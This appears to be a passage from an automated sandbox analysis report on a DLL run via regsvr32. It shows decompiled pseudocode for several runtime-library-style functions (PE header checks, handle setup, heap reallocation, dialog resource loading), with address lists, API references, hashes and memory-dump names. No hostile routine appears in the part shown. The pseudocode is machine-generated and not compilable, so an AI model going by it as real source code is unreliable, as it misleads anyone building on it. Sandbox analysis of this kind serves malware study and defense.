										__eflags = _t82;
										if(_t82 > 0) {
											continue;
										}
										goto L33;
									}
									goto L33;
								}
								_t77 = _v36.AllocationBase;
								__eflags =  *_t77 - 0x5a4d;
								if( *_t77 != 0x5a4d) {
									goto L56;
								}
								_t55 =  *((intOrPtr*)(_t77 + 0x3c)) + _t77;
								__eflags =  *_t55 - 0x4550;
								if( *_t55 != 0x4550) {
									goto L56;
								}
								__eflags =  *((short*)(_t55 + 0x18)) - 0x10b;
								if( *((short*)(_t55 + 0x18)) != 0x10b) {
									goto L56;
								}
								_t71 = _t69 - _t77;
								__eflags =  *((short*)(_t55 + 6));
								_t79 = ( *(_t55 + 0x14) & 0x0000ffff) + _t55 + 0x18;
								if( *((short*)(_t55 + 6)) <= 0) {
									goto L56;
								}
								_t63 =  *((intOrPtr*)(_t79 + 0xc));
								__eflags = _t71 - _t63;
								if(_t71 < _t63) {
									goto L28;
								}
								__eflags = _t71 -  *((intOrPtr*)(_t79 + 8)) + _t63;
								if(_t71 >=  *((intOrPtr*)(_t79 + 8)) + _t63) {
									goto L28;
								}
								__eflags =  *(_t79 + 0x27) & 0x00000080;
								if(( *(_t79 + 0x27) & 0x00000080) != 0) {
									goto L41;
								}
								goto L28;
							} else {
								goto L16;
							}
							while(1) {
								L16:
								__eflags =  *((intOrPtr*)(0x1003a358 + _t93 * 4)) - _t91;
								if( *((intOrPtr*)(0x1003a358 + _t93 * 4)) == _t91) {
									break;
								}
								_t93 = _t93 + 1;
								__eflags = _t93 - _t53;
								if(_t93 < _t53) {
									continue;
								}
								goto L18;
							}
							__eflags = _t93;
							if(_t93 <= 0) {
								goto L5;
							}
							_t64 = InterlockedExchange(0x1003a398, 1);
							__eflags = _t64;
							if(_t64 != 0) {
								goto L5;
							}
							__eflags =  *((intOrPtr*)(0x1003a358 + _t93 * 4)) - _t91;
							if( *((intOrPtr*)(0x1003a358 + _t93 * 4)) == _t91) {
								L53:
								_t80 = 0;
								__eflags = _t93;
								if(_t93 < 0) {
									L55:
									InterlockedExchange(0x1003a398, 0);
									goto L5;
								} else {
									goto L54;
								}
								do {
									L54:
									_t66 = 0x1003a358 + _t80 * 4;
									_t80 = _t80 + 1;
									__eflags = _t80 - _t93;
									 *_t66 = _t91;
									_t91 =  *_t66;
								} while (_t80 <= _t93);
								goto L55;
							}
							_t67 =  *0x1003a350; // 0x0
							_t43 = _t67 - 1; // -1
							_t93 = _t43;
							__eflags = _t93;
							if(_t93 < 0) {
								L49:
								__eflags = _t67 - 0x10;
								if(_t67 < 0x10) {
									_t67 = _t67 + 1;
									__eflags = _t67;
									 *0x1003a350 = _t67;
								}
								_t46 = _t67 - 1; // 0x0
								_t93 = _t46;
								goto L53;
							} else {
								goto L46;
							}
							while(1) {
								L46:
								__eflags =  *((intOrPtr*)(0x1003a358 + _t93 * 4)) - _t91;
								if( *((intOrPtr*)(0x1003a358 + _t93 * 4)) == _t91) {
									break;
								}
								_t93 = _t93 - 1;
								__eflags = _t93;
								if(_t93 >= 0) {
									continue;
								}
								break;
							}
							__eflags = _t93;
							if(__eflags >= 0) {
								if(__eflags == 0) {
									goto L55;
								}
								goto L53;
							}
							goto L49;
						}
						_t68 =  *((intOrPtr*)(_t92 - 8));
						__eflags = _t68 - _v8;
						if(_t68 < _v8) {
							goto L41;
						}
						__eflags = _t68 - _t92;
						if(_t68 >= _t92) {
							goto L41;
						}
						goto L15;
					}
					L5:
					_t56 = 1;
					goto L57;
				} else {
					goto L3;
				}
			}

0x10016513
0x10016516
0x1001651c
0x10016539
0x00000000
0x10016539
0x10016524
0x10016527
0x1001652a
0x1001652f
0x10016532
0x10016541
0x10016544
0x10016547
0x10016551
0x10016551
0x10016553
0x10016556
0x10016558
0x10016558
0x1001655a
0x1001655d
0x00000000
0x00000000
0x1001655f
0x10016561
0x100166ac
0x100166ac
0x1001672f
0x00000000
0x1001672f
0x10016567
0x10016567
0x1001656b
0x1001656d
0x1001656d
0x1001656d
0x1001656d
0x10016570
0x10016571
0x10016574
0x10016574
0x10016578
0x1001657c
0x10016592
0x10016592
0x10016599
0x1001659f
0x100165a1
0x100165a3
0x100165b7
0x100165be
0x100165c4
0x100165c6
0x1001672c
0x1001672c
0x1001672c
0x00000000
0x1001672c
0x100165cc
0x100165d3
0x00000000
0x00000000
0x100165d9
0x100165dd
0x10016635
0x1001663c
0x10016642
0x10016644
0x00000000
0x00000000
0x1001664a
0x10016650
0x10016652
0x10016654
0x10016669
0x10016669
0x1001666b
0x1001669a
0x100166a1
0x00000000
0x100166a1
0x1001666f
0x10016670
0x10016672
0x10016674
0x10016674
0x10016676
0x10016678
0x1001667a
0x1001668e
0x1001668e
0x10016691
0x10016693
0x10016693
0x10016694
0x10016694
0x00000000
0x1001667c
0x1001667c
0x1001667c
0x10016685
0x10016686
0x10016688
0x1001668a
0x1001668a
0x00000000
0x1001667c
0x1001667a
0x10016656
0x1001665d
0x1001665d
0x1001665f
0x00000000
0x00000000
0x10016661
0x10016662
0x10016665
0x10016667
0x00000000
0x00000000
0x00000000
0x10016667
0x00000000
0x1001665d
0x100165df
0x100165e2
0x100165e7
0x00000000
0x00000000
0x100165f0
0x100165f2
0x100165f8
0x00000000
0x00000000
0x100165fe
0x10016604
0x00000000
0x00000000
0x1001660a
0x1001660c
0x10016615
0x10016619
0x00000000
0x00000000
0x1001661f
0x10016622
0x10016624
0x00000000
0x00000000
0x1001662b
0x1001662d
0x00000000
0x00000000
0x1001662f
0x10016633
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x100165a5
0x100165a5
0x100165a5
0x100165ac
0x00000000
0x00000000
0x100165b2
0x100165b3
0x100165b5
0x00000000
0x00000000
0x00000000
0x100165b5
0x100166b0
0x100166b2
0x00000000
0x00000000
0x100166c5
0x100166c7
0x100166c9
0x00000000
0x00000000
0x100166cf
0x100166d6
0x10016706
0x10016706
0x10016708
0x1001670a
0x1001671e
0x10016725
0x00000000
0x00000000
0x00000000
0x00000000
0x1001670c
0x1001670c
0x1001670c
0x10016715
0x10016716
0x10016718
0x1001671a
0x1001671a
0x00000000
0x1001670c
0x100166d8
0x100166dd
0x100166dd
0x100166e0
0x100166e2
0x100166f4
0x100166f4
0x100166f7
0x100166f9
0x100166f9
0x100166fa
0x100166fa
0x100166ff
0x100166ff
0x00000000
0x00000000
0x00000000
0x00000000
0x100166e4
0x100166e4
0x100166e4
0x100166eb
0x00000000
0x00000000
0x100166ed
0x100166ed
0x100166ee
0x00000000
0x00000000
0x00000000
0x100166ee
0x100166f0
0x100166f2
0x10016704
0x00000000
0x00000000
0x00000000
0x10016704
0x00000000
0x100166f2
0x1001657e
0x10016581
0x10016584
0x00000000
0x00000000
0x1001658a
0x1001658c
0x00000000
0x00000000
0x00000000
0x1001658c
0x10016549
0x1001654b
0x00000000
0x00000000
0x00000000
0x00000000

APIs

VirtualQuery.KERNEL32(?,?,0000001C,?,?,?,?,?,100115FD,?), ref: 100165BE
InterlockedExchange.KERNEL32(1003A398,00000001), ref: 1001663C
InterlockedExchange.KERNEL32(1003A398,00000000), ref: 100166A1
InterlockedExchange.KERNEL32(1003A398,00000001), ref: 100166C5
InterlockedExchange.KERNEL32(1003A398,00000000), ref: 10016725

Memory Dump Source

Source File: 00000002.00000002.415597356.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.415592925.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415709895.000000001002B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415778700.0000000010036000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415806032.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: ExchangeInterlocked$QueryVirtual
String ID:
API String ID: 2947987494-0
Opcode ID: a92e8bdecec280d67aebfc8bcd6e3637f2153321ce66abaa1df021a309a4e260
Instruction ID: 13da356d60a0ce488386f7cf4b3a526205ffe0f674f80f842afbf78077e81b88
Opcode Fuzzy Hash: a92e8bdecec280d67aebfc8bcd6e3637f2153321ce66abaa1df021a309a4e260
Instruction Fuzzy Hash: 9851D130E00A62CFDB15CF68CCD475977E2EB8A398F258169E8428F295E771EDC2C640

Uniqueness

Uniqueness Score: -1.00%

Function 10016734 Relevance: 7.7, APIs: 5, Instructions: 172
COMMON

Download Yara Rule

C-Code - Quality: 96%

			E10016734() {
				void* __ebp;
				signed int _t51;
				signed int _t55;
				long _t59;
				signed int _t61;
				signed int _t62;
				signed int _t64;
				signed int _t65;
				void* _t69;
				signed int* _t78;
				signed int _t81;
				signed int _t82;
				signed int _t84;
				signed int _t85;
				signed int _t86;
				signed char _t89;
				signed int _t96;
				void* _t99;
				int _t101;
				void** _t103;
				void** _t105;
				signed int** _t106;
				intOrPtr* _t109;
				void* _t110;

				_t51 = E10011233(0x480);
				if(_t51 != 0) {
					 *0x1003a6c0 = _t51;
					 *0x1003a6ac = 0x20;
					_t1 = _t51 + 0x480; // 0x480
					_t84 = _t1;
					while(1) {
						__eflags = _t51 - _t84;
						if(_t51 >= _t84) {
							break;
						}
						 *_t51 =  *_t51 | 0xffffffff;
						 *(_t51 + 8) =  *(_t51 + 8) & 0x00000000;
						 *((char*)(_t51 + 4)) = 0;
						 *((char*)(_t51 + 5)) = 0xa;
						_t85 =  *0x1003a6c0; // 0x0
						_t51 = _t51 + 0x24;
						_t84 = _t85 + 0x480;
						__eflags = _t84;
					}
					GetStartupInfoA(_t110 + 0x14);
					__eflags =  *((short*)(_t110 + 0x46));
					if( *((short*)(_t110 + 0x46)) == 0) {
						L26:
						_t81 = 0;
						__eflags = 0;
						do {
							_t86 =  *0x1003a6c0; // 0x0
							_t103 = _t86 + (_t81 + _t81 * 8) * 4;
							__eflags =  *_t103 - 0xffffffff;
							if( *_t103 != 0xffffffff) {
								_t49 =  &(_t103[1]);
								 *_t49 = _t103[1] | 0x00000080;
								__eflags =  *_t49;
								goto L42;
							}
							__eflags = _t81;
							_t103[1] = 0x81;
							if(_t81 != 0) {
								asm("sbb eax, eax");
								_t59 =  ~(_t81 - 1) + 0xfffffff5;
								__eflags = _t59;
							} else {
								_t59 = 0xfffffff6;
							}
							_t99 = GetStdHandle(_t59);
							__eflags = _t99 - 0xffffffff;
							if(_t99 == 0xffffffff) {
								L40:
								_t103[1] = _t103[1] | 0x00000040;
							} else {
								_t61 = GetFileType(_t99);
								__eflags = _t61;
								if(_t61 == 0) {
									goto L40;
								}
								_t62 = _t61 & 0x000000ff;
								__eflags = _t62 - 2;
								 *_t103 = _t99;
								if(__eflags != 0) {
									__eflags = _t62 - 3;
									if(__eflags == 0) {
										_t42 =  &(_t103[1]);
										 *_t42 = _t103[1] | 0x00000008;
										__eflags =  *_t42;
									}
								} else {
									_t103[1] = _t103[1] | 0x00000040;
								}
								_push(0xfa0);
								_push( &(_t103[3]));
								_t64 = E10019F98(__eflags);
								__eflags = _t64;
								if(_t64 == 0) {
									L30:
									_t55 = _t64 | 0xffffffff;
									L44:
									return _t55;
								} else {
									_t103[2] = _t103[2] + 1;
									goto L42;
								}
							}
							L42:
							_t81 = _t81 + 1;
							__eflags = _t81 - 3;
						} while (_t81 < 3);
						SetHandleCount( *0x1003a6ac);
						_t55 = 0;
						__eflags = 0;
						goto L44;
					}
					_t65 =  *(_t110 + 0x48);
					__eflags = _t65;
					if(_t65 == 0) {
						goto L26;
					}
					_t101 =  *_t65;
					_t109 = _t65 + 4;
					 *(_t110 + 0x10) = _t101 + _t109;
					__eflags = _t101 - 0x800;
					if(_t101 >= 0x800) {
						_t101 = 0x800;
					}
					__eflags =  *0x1003a6ac - _t101; // 0x20
					if(__eflags >= 0) {
						L18:
						_t82 = 0;
						__eflags = _t101;
						if(_t101 <= 0) {
							goto L26;
						} else {
							goto L19;
						}
						do {
							L19:
							_t69 =  *( *(_t110 + 0x10));
							__eflags = _t69 - 0xffffffff;
							if(_t69 == 0xffffffff) {
								goto L25;
							}
							_t89 =  *_t109;
							__eflags = _t89 & 0x00000001;
							if((_t89 & 0x00000001) == 0) {
								goto L25;
							}
							__eflags = _t89 & 0x00000008;
							if(__eflags != 0) {
								L23:
								_t105 = 0x1003a6c0[_t82 >> 5] + ((_t82 & 0x0000001f) + (_t82 & 0x0000001f) * 8) * 4;
								 *_t105 =  *( *(_t110 + 0x10));
								_t105[1] =  *_t109;
								_push(0xfa0);
								_push( &(_t105[3]));
								_t64 = E10019F98(__eflags);
								__eflags = _t64;
								if(_t64 == 0) {
									goto L30;
								}
								_t31 =  &(_t105[2]);
								 *_t31 = _t105[2] + 1;
								__eflags =  *_t31;
								goto L25;
							}
							__eflags = GetFileType(_t69);
							if(__eflags == 0) {
								goto L25;
							}
							goto L23;
							L25:
							 *(_t110 + 0x10) =  &(( *(_t110 + 0x10))[1]);
							_t82 = _t82 + 1;
							_t109 = _t109 + 1;
							__eflags = _t82 - _t101;
						} while (_t82 < _t101);
						goto L26;
					} else {
						_t106 = 0x1003a6c4;
						while(1) {
							_t78 = E10011233(0x480);
							__eflags = _t78;
							if(_t78 == 0) {
								break;
							}
							 *0x1003a6ac =  *0x1003a6ac + 0x20;
							 *_t106 = _t78;
							_t12 =  &(_t78[0x120]); // 0x480
							_t96 = _t12;
							while(1) {
								__eflags = _t78 - _t96;
								if(_t78 >= _t96) {
									break;
								}
								 *_t78 =  *_t78 | 0xffffffff;
								_t78[2] = _t78[2] & 0x00000000;
								_t78[1] = 0;
								_t78[1] = 0xa;
								_t78 =  &(_t78[9]);
								_t96 =  &(( *_t106)[0x120]);
								__eflags = _t96;
							}
							_t106 =  &(_t106[1]);
							__eflags =  *0x1003a6ac - _t101; // 0x20
							if(__eflags < 0) {
								continue;
							}
							goto L18;
						}
						_t101 =  *0x1003a6ac; // 0x20
						goto L18;
					}
				}
				return _t51 | 0xffffffff;
			}

0x1001673e
0x10016746
0x10016750
0x10016755
0x1001675f
0x1001675f
0x10016785
0x10016785
0x10016787
0x00000000
0x00000000
0x10016767
0x1001676a
0x1001676e
0x10016772
0x10016776
0x1001677c
0x1001677f
0x1001677f
0x1001677f
0x10016791
0x10016797
0x1001679d
0x1001688c
0x1001688c
0x1001688c
0x1001688e
0x1001688e
0x10016897
0x1001689a
0x1001689d
0x1001690e
0x1001690e
0x1001690e
0x00000000
0x1001690e
0x1001689f
0x100168a1
0x100168a5
0x100168b6
0x100168b8
0x100168b8
0x100168a7
0x100168a9
0x100168a9
0x100168c2
0x100168c4
0x100168c7
0x10016908
0x10016908
0x100168c9
0x100168ca
0x100168d0
0x100168d2
0x00000000
0x00000000
0x100168d4
0x100168d9
0x100168dc
0x100168de
0x100168e6
0x100168e9
0x100168eb
0x100168eb
0x100168eb
0x100168eb
0x100168e0
0x100168e0
0x100168e0
0x100168f2
0x100168f7
0x100168f8
0x100168fd
0x10016901
0x100168ac
0x100168ac
0x1001692a
0x00000000
0x10016903
0x10016903
0x00000000
0x10016903
0x10016901
0x10016912
0x10016912
0x10016913
0x10016913
0x10016922
0x10016928
0x10016928
0x00000000
0x10016928
0x100167a3
0x100167a7
0x100167a9
0x00000000
0x00000000
0x100167af
0x100167b1
0x100167b7
0x100167c0
0x100167c2
0x100167c4
0x100167c4
0x100167c6
0x100167cc
0x1001681c
0x1001681c
0x1001681e
0x10016820
0x00000000
0x00000000
0x00000000
0x00000000
0x10016822
0x10016822
0x10016826
0x10016828
0x1001682b
0x00000000
0x00000000
0x1001682d
0x10016830
0x10016833
0x00000000
0x00000000
0x10016835
0x10016838
0x10016845
0x10016859
0x10016862
0x10016867
0x1001686d
0x10016872
0x10016873
0x10016878
0x1001687c
0x00000000
0x00000000
0x1001687e
0x1001687e
0x1001687e
0x00000000
0x1001687e
0x10016841
0x10016843
0x00000000
0x00000000
0x00000000
0x10016881
0x10016881
0x10016886
0x10016887
0x10016888
0x10016888
0x00000000
0x100167ce
0x100167ce
0x100167d3
0x100167d4
0x100167d9
0x100167dc
0x00000000
0x00000000
0x100167de
0x100167e5
0x100167e7
0x100167e7
0x10016805
0x10016805
0x10016807
0x00000000
0x00000000
0x100167ef
0x100167f2
0x100167f6
0x100167fa
0x10016800
0x10016803
0x10016803
0x10016803
0x10016809
0x1001680c
0x10016812
0x00000000
0x00000000
0x00000000
0x10016814
0x10016816
0x00000000
0x10016816
0x100167cc
0x00000000

APIs

GetStartupInfoA.KERNEL32(?), ref: 10016791
GetFileType.KERNEL32(?), ref: 1001683B
GetStdHandle.KERNEL32(-000000F6), ref: 100168BC

Memory Dump Source

Source File: 00000002.00000002.415597356.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.415592925.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415709895.000000001002B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415778700.0000000010036000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415806032.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: FileHandleInfoStartupType
String ID:
API String ID: 2461013171-0
Opcode ID: 39bd6c0a2537f980138bdfcda5a7014c3e9503719eba479eff4ba72a046c4577
Instruction ID: ae4eadd130dfd93b329f7a7150f3bd3cbe8e0b7cc579ad8a56df31e72a56c48d
Opcode Fuzzy Hash: 39bd6c0a2537f980138bdfcda5a7014c3e9503719eba479eff4ba72a046c4577
Instruction Fuzzy Hash: FF51D071A047428FD710CF68CC886167BE4EB0A324F298B6CD9A6CF2E2DB34D489C701

Uniqueness

Uniqueness Score: -1.00%

Function 10012D2C Relevance: 7.6, APIs: 5, Instructions: 150
COMMON

Download Yara Rule

C-Code - Quality: 50%

			E10012D2C(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				long _t30;
				long _t31;
				long _t33;
				void* _t36;
				long _t38;
				long _t41;
				long _t42;
				long _t44;
				long _t46;
				void* _t59;
				long _t61;
				void* _t67;
				void* _t68;

				_push(0x14);
				_push(0x1002e8f8);
				E10012CE0(__ebx, __edi, __esi);
				_t59 =  *(_t67 + 8);
				if(_t59 != 0) {
					_t61 =  *(_t67 + 0xc);
					__eflags = _t61;
					if(_t61 != 0) {
						__eflags =  *0x1003b804 - 3;
						if( *0x1003b804 != 3) {
							while(1) {
								_t28 = 0;
								__eflags = _t61 - 0xffffffe0;
								if(_t61 <= 0xffffffe0) {
									__eflags = _t61;
									if(_t61 == 0) {
										_t61 = 1;
										__eflags = 1;
									}
									_t28 = HeapReAlloc( *0x1003b800, 0, _t59, _t61);
								}
								__eflags = _t28;
								if(_t28 != 0) {
									goto L37;
								}
								__eflags =  *0x1003a33c; // 0x0
								if(__eflags == 0) {
									goto L37;
								}
								_t30 = E10015832(_t61);
								__eflags = _t30;
								if(_t30 != 0) {
									continue;
								}
								goto L36;
							}
							goto L37;
						} else {
							goto L5;
						}
						do {
							L5:
							 *(_t67 - 0x1c) = 0;
							__eflags = _t61 - 0xffffffe0;
							if(_t61 > 0xffffffe0) {
								L25:
								_t28 =  *(_t67 - 0x1c);
								__eflags =  *(_t67 - 0x1c);
								if( *(_t67 - 0x1c) != 0) {
									goto L37;
								}
								__eflags =  *0x1003a33c; // 0x0
								if(__eflags == 0) {
									goto L37;
								}
								goto L27;
							}
							E10014CDE(0, _t59, 4);
							 *(_t67 - 4) = 0;
							_t33 = E10014D57(_t59);
							 *(_t67 - 0x20) = _t33;
							__eflags = _t33;
							if(_t33 == 0) {
								L21:
								 *(_t67 - 4) =  *(_t67 - 4) | 0xffffffff;
								E10012E94();
								__eflags =  *(_t67 - 0x20);
								if( *(_t67 - 0x20) == 0) {
									__eflags = _t61;
									if(_t61 == 0) {
										_t61 = 1;
										__eflags = 1;
									}
									_t61 = _t61 + 0x0000000f & 0xfffffff0;
									__eflags = _t61;
									 *(_t67 + 0xc) = _t61;
									 *(_t67 - 0x1c) = HeapReAlloc( *0x1003b800, 0, _t59, _t61);
								}
								goto L25;
							}
							__eflags = _t61 -  *0x1003b7f0; // 0x0
							if(__eflags <= 0) {
								_push(_t61);
								_push(_t59);
								_push(_t33);
								_t41 = E10015257();
								_t68 = _t68 + 0xc;
								__eflags = _t41;
								if(_t41 == 0) {
									_push(_t61);
									_t42 = E10015536();
									 *(_t67 - 0x1c) = _t42;
									__eflags = _t42;
									if(_t42 != 0) {
										_t44 =  *((intOrPtr*)(_t59 - 4)) - 1;
										 *(_t67 - 0x24) = _t44;
										__eflags = _t44 - _t61;
										if(_t44 >= _t61) {
											_t44 = _t61;
										}
										E10011CC0( *(_t67 - 0x1c), _t59, _t44);
										_t46 = E10014D57(_t59);
										 *(_t67 - 0x20) = _t46;
										_push(_t59);
										_push(_t46);
										E10014D82();
										_t68 = _t68 + 0x18;
									}
								} else {
									 *(_t67 - 0x1c) = _t59;
								}
							}
							__eflags =  *(_t67 - 0x1c);
							if( *(_t67 - 0x1c) == 0) {
								__eflags = _t61;
								if(_t61 == 0) {
									_t61 = 1;
									__eflags = 1;
									 *(_t67 + 0xc) = 1;
								}
								_t61 = _t61 + 0x0000000f & 0xfffffff0;
								 *(_t67 + 0xc) = _t61;
								_t36 = HeapAlloc( *0x1003b800, 0, _t61);
								 *(_t67 - 0x1c) = _t36;
								__eflags = _t36;
								if(_t36 != 0) {
									_t38 =  *((intOrPtr*)(_t59 - 4)) - 1;
									 *(_t67 - 0x24) = _t38;
									__eflags = _t38 - _t61;
									if(_t38 >= _t61) {
										_t38 = _t61;
									}
									E10011CC0( *(_t67 - 0x1c), _t59, _t38);
									_push(_t59);
									_push( *(_t67 - 0x20));
									E10014D82();
									_t68 = _t68 + 0x14;
								}
							}
							goto L21;
							L27:
							_t31 = E10015832(_t61);
							__eflags = _t31;
						} while (_t31 != 0);
						goto L36;
					} else {
						_push(_t59);
						E1001111B();
						L36:
						_t28 = 0;
						__eflags = 0;
						goto L37;
					}
				} else {
					_t28 = E10011233( *(_t67 + 0xc));
					L37:
					return E10012D1B(_t28);
				}
			}

0x10012d2c
0x10012d2e
0x10012d33
0x10012d38
0x10012d3f
0x10012d4f
0x10012d52
0x10012d54
0x10012d62
0x10012d69
0x10012e9d
0x10012e9d
0x10012e9f
0x10012ea2
0x10012ea4
0x10012ea6
0x10012eaa
0x10012eaa
0x10012eaa
0x10012eb4
0x10012eb4
0x10012eba
0x10012ebc
0x00000000
0x00000000
0x10012ebe
0x10012ec4
0x00000000
0x00000000
0x10012ec7
0x10012ecd
0x10012ecf
0x00000000
0x00000000
0x00000000
0x10012ecf
0x00000000
0x00000000
0x00000000
0x00000000
0x10012d6f
0x10012d6f
0x10012d6f
0x10012d72
0x10012d75
0x10012e6c
0x10012e6c
0x10012e6f
0x10012e71
0x00000000
0x00000000
0x10012e73
0x10012e79
0x00000000
0x00000000
0x00000000
0x10012e79
0x10012d7d
0x10012d83
0x10012d87
0x10012d8d
0x10012d90
0x10012d92
0x10012e3c
0x10012e3c
0x10012e40
0x10012e45
0x10012e48
0x10012e4a
0x10012e4c
0x10012e50
0x10012e50
0x10012e50
0x10012e54
0x10012e54
0x10012e57
0x10012e69
0x10012e69
0x00000000
0x10012e48
0x10012d98
0x10012d9e
0x10012da0
0x10012da1
0x10012da2
0x10012da3
0x10012da8
0x10012dab
0x10012dad
0x10012db4
0x10012db5
0x10012dbb
0x10012dbe
0x10012dc0
0x10012dc5
0x10012dc6
0x10012dc9
0x10012dcb
0x10012dcd
0x10012dcd
0x10012dd4
0x10012dda
0x10012ddf
0x10012de2
0x10012de3
0x10012de4
0x10012de9
0x10012de9
0x10012daf
0x10012daf
0x10012daf
0x10012dad
0x10012dec
0x10012def
0x10012df1
0x10012df3
0x10012df7
0x10012df7
0x10012df8
0x10012df8
0x10012dfe
0x10012e01
0x10012e0c
0x10012e12
0x10012e15
0x10012e17
0x10012e1c
0x10012e1d
0x10012e20
0x10012e22
0x10012e24
0x10012e24
0x10012e2b
0x10012e30
0x10012e31
0x10012e34
0x10012e39
0x10012e39
0x10012e17
0x00000000
0x10012e7b
0x10012e7c
0x10012e82
0x10012e82
0x00000000
0x10012d56
0x10012d56
0x10012d57
0x10012ed1
0x10012ed1
0x10012ed1
0x00000000
0x10012ed1
0x10012d41
0x10012d44
0x10012ed3
0x10012ed8
0x10012ed8

Memory Dump Source

Source File: 00000002.00000002.415597356.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.415592925.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415709895.000000001002B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415778700.0000000010036000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415806032.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: df5a29b0ae4f8ee9308cb7d2da71c9a230697a7438a9e5377a91f2938de3118a
Instruction ID: 9c96b4c689c58b539e8ae89f5bc5b66854a000cef3f3b6c36b6fe0eca7dee594
Opcode Fuzzy Hash: df5a29b0ae4f8ee9308cb7d2da71c9a230697a7438a9e5377a91f2938de3118a
Instruction Fuzzy Hash: E641B1B5D0026AAACF11EF65DC8489F7AF4EB417A47124129F924AF191D730DDE1CB90

Uniqueness

Uniqueness Score: -1.00%

Function 1000780B Relevance: 7.6, APIs: 5, Instructions: 133
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E1000780B(intOrPtr* __ecx, void* _a4, signed int _a8, intOrPtr _a12) {
				void* _v8;
				void* _v12;
				intOrPtr _v16;
				signed int _v20;
				void* _t59;
				signed int _t61;
				signed int _t62;
				void* _t64;
				int* _t72;
				struct HWND__* _t73;
				intOrPtr _t78;
				struct HRSRC__* _t81;
				void* _t82;
				void* _t86;
				void* _t88;
				void* _t89;
				intOrPtr _t90;
				void* _t93;
				intOrPtr _t95;
				intOrPtr _t101;
				intOrPtr _t103;
				struct HINSTANCE__* _t105;
				intOrPtr* _t106;
				void* _t107;

				_t106 = __ecx;
				_v8 = 0;
				_v12 = 0;
				if(_a8 != 0) {
					_t105 =  *(E10027747() + 0xc);
					_t81 = FindResourceA(_t105, _a8, 0xf0);
					if(_t81 != 0) {
						_t82 = LoadResource(_t105, _t81);
						_v12 = _t82;
						if(_t82 == 0) {
							return 0;
						}
						_v8 = LockResource(_t82);
					}
				}
				__eflags = _v8;
				_t86 = _a4;
				_t103 = _a12;
				_v16 = 1;
				if(_v8 != 0) {
					_t78 =  *((intOrPtr*)( *_t106 + 0x1c))(_t86, _v8, _t103);
					__eflags = _v12;
					_v16 = _t78;
					if(_v12 != 0) {
						FreeResource(_v12);
					}
				}
				_t59 =  *(_t86 + 0x48);
				__eflags = _t59;
				if(_t59 == 0) {
					L25:
					return _v16;
				} else {
					_t88 =  *(_t59 + 0x40);
					_a8 = _a8 & 0x00000000;
					__eflags = _t88;
					_a4 = _t88;
					_v12 = _t88;
					if(_t88 != 0) {
						_a8 =  *(E10007404( &_a4));
					}
					_t61 = 0;
					__eflags =  *(_t103 + 8);
					_v8 = 0;
					if( *(_t103 + 8) > 0) {
						do {
							_t89 = _a8;
							__eflags = _t89;
							if(_t89 == 0) {
								L17:
								_t90 =  *((intOrPtr*)(_t103 + 0xc));
								_t62 = _t61 << 3;
								__eflags =  *(_t62 + _t90);
								_v20 = _t62;
								if( *(_t62 + _t90) != 0) {
									_t107 = E1001F51F(0xc);
									__eflags = _t107;
									if(_t107 == 0) {
										_t107 = 0;
										__eflags = 0;
									} else {
										_t72 =  *((intOrPtr*)(_t103 + 0xc)) + _v20;
										_t73 = GetDlgItem( *(_t86 + 0x1c),  *_t72);
										 *(_t107 + 4) =  *(_t107 + 4) & 0x00000000;
										 *(_t107 + 8) = _t72[1];
										_t103 = _a12;
										 *_t107 = _t73;
									}
									_t93 =  *(_t86 + 0x48) + 0x3c;
									__eflags = _v12;
									_push(_t107);
									if(__eflags == 0) {
										E1001D9E9(_t93, __eflags);
									} else {
										_push(_v12);
										E1001DA12(_t93);
									}
								}
								goto L24;
							}
							_t95 =  *((intOrPtr*)(_t89 + 4));
							_t101 =  *((intOrPtr*)(_t103 + 0xc));
							__eflags =  *((intOrPtr*)(_t95 + 0x28)) -  *((intOrPtr*)(_t101 + _t61 * 8));
							if( *((intOrPtr*)(_t95 + 0x28)) !=  *((intOrPtr*)(_t101 + _t61 * 8))) {
								goto L17;
							} else {
								_t64 = _a4;
								__eflags = _t64;
								_v12 = _t64;
								if(_t64 == 0) {
									_a8 = _a8 & 0x00000000;
								} else {
									_a8 =  *(E10007404( &_a4));
								}
							}
							L24:
							_t61 = _v8 + 1;
							__eflags = _t61 -  *(_t103 + 8);
							_v8 = _t61;
						} while (_t61 <  *(_t103 + 8));
					}
					goto L25;
				}
			}

0x10007819
0x1000781b
0x1000781e
0x10007821
0x10007828
0x10007834
0x1000783c
0x10007840
0x10007848
0x1000784b
0x00000000
0x1000784d
0x1000785b
0x1000785b
0x1000783c
0x1000785e
0x10007861
0x10007864
0x10007867
0x1000786e
0x10007879
0x1000787c
0x10007880
0x10007883
0x10007888
0x10007888
0x10007883
0x1000788e
0x10007891
0x10007893
0x10007974
0x00000000
0x10007899
0x10007899
0x1000789c
0x100078a0
0x100078a2
0x100078a5
0x100078a8
0x100078b8
0x100078b8
0x100078bb
0x100078bd
0x100078c0
0x100078c3
0x100078c9
0x100078c9
